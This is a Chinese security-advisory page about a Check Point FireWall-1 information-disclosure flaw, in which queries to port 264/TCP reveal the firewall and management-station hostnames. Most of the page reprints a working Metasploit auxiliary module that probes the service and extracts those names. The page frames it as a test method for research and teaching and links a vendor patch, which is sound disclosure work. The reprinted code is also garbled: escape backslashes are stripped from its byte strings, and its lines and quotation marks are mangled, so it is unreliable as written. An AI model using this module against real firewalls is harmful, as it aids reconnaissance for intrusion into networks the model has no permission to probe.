Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / 多个Check Point防火墙产品信息泄露漏洞

发布日期:2012-03-12
更新日期:2012-03-14受影响系统:
Check Point Software FireWall-1 NGX R71
Check Point Software FireWall-1 NGX R65
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 52430Check Point软件技术有限公司成立时间于 1993 年,美国总部在加利福尼亚州红木城,是全球首屈一指的 Internet 安全解决方案供应商,在全球企业防火墙、个人防火墙及虚拟专用网络(VPN )市场上居于领导地位。Check Point多款端点安全产品在实现上存在信息泄露漏洞,通过发送某些查询到CheckPoint Firewall-1上的端口264/TCP,会显示主机名。攻击者可利用此漏洞获取敏感信息。
<*来源:Patrick Webster (pwebster@ausgeo.com.au) http://www.linuxidc.com/Linux/2012-03/56700.htm
  *>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!Patrick Webster (pwebster@ausgeo.com.au)提供了如下测试方法:##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##require "msf/core"class Metasploit3 < Msf::Auxiliary    include Msf::Exploit::Remote::Tcp    def initialize(info = {})
        super(update_info(info,
            "Name"           => "CheckPoint Firewall-1 SecuRemote Topology Service Hostname Disclosure",
            "Description"    => %q{
                This module sends a query to the port 264/TCP on CheckPoint Firewall-1
                firewalls to obtain the firewall name and management station
                (such as SmartCenter) name via a pre-authentication topology request.
                Note that the SecuriTeam reference listed here is not the same vulnerabilty, but it
                does discus the same protocol and is somewhat related to this information
                disclosure.
            },
            "Author"         => [ "patrick" ],
            "DisclosureDate" => "Dec 14 2011", # Looks like this module is first real reference
            "References"     =>
                [
                    # patrickw - None? Stumbled across, probably an old bug/feature but unsure.
                    [ "URL", "http://www.osisecurity.com.au/advisories/" ], # Advisory coming soon, placeholder
                    [ "URL", "http://www.securiteam.com/securitynews/5HP0D2A4UC.html" ] # Related-ish
                ]
        ))        register_options(
            [
                Opt::RPORT(264),
            ], self.class)
    end    def autofilter
        false
    end    def run
        print_status("Attempting to contact Checkpoint FW1 SecuRemote Topology service...")
        fw_hostname = nil
        sc_hostname = nil        connect        sock.put("x51x00x00x00")
        sock.put("x00x00x00x21")
        res = sock.get_once(4)
        if (res == "Yx00x00x00")
            print_good("Appears to be a CheckPoint Firewall...")
            sock.put("x00x00x00x0bsecuremotex00")
            res = sock.get_once
            if (res =~ /CN=(.+),O=(.+)./i)
                fw_hostname = $1
                sc_hostname = $2
                print_good("Firewall Host: #{fw_hostname}")
                print_good("SmartCenter Host: #{sc_hostname}")
            end
        else
            print_error("Unexpected response: "#{res.inspect}"")
        end        report_info(fw_hostname,sc_hostname)        disconnect
    end    # Only trust that it"s real if we have a hostname. If you get a funny
    # response, it might not be what we think it is.
    def report_info(fw_hostname,sc_hostname)
        return unless fw_hostname
        host_info = {
            :host => datastore["RHOST"],
            :os_name => "Checkpoint Firewall-1",
            :purpose => "firewall"
        }
        host_info[:name] = fw_hostname
        host_info[:info] = "SmartCenter Host: #{sc_hostname}" if sc_hostname
        report_host(host_info)
        svc_info = {
            :host => datastore["RHOST"],
            :port => datastore["RPORT"],
            :proto => "tcp",
            :name => "securemote"
        }
        report_service(svc_info)
    endend建议:
--------------------------------------------------------------------------------
厂商补丁:Check Point Software
--------------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://www.checkpoint.comlibpng "png_inflate()"堆缓冲区溢出漏洞Cisco ASA威胁检测拒绝服务漏洞相关资讯      Check Point  本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
  • 参与本评论即表明您已经阅读并接受上述条款
  • <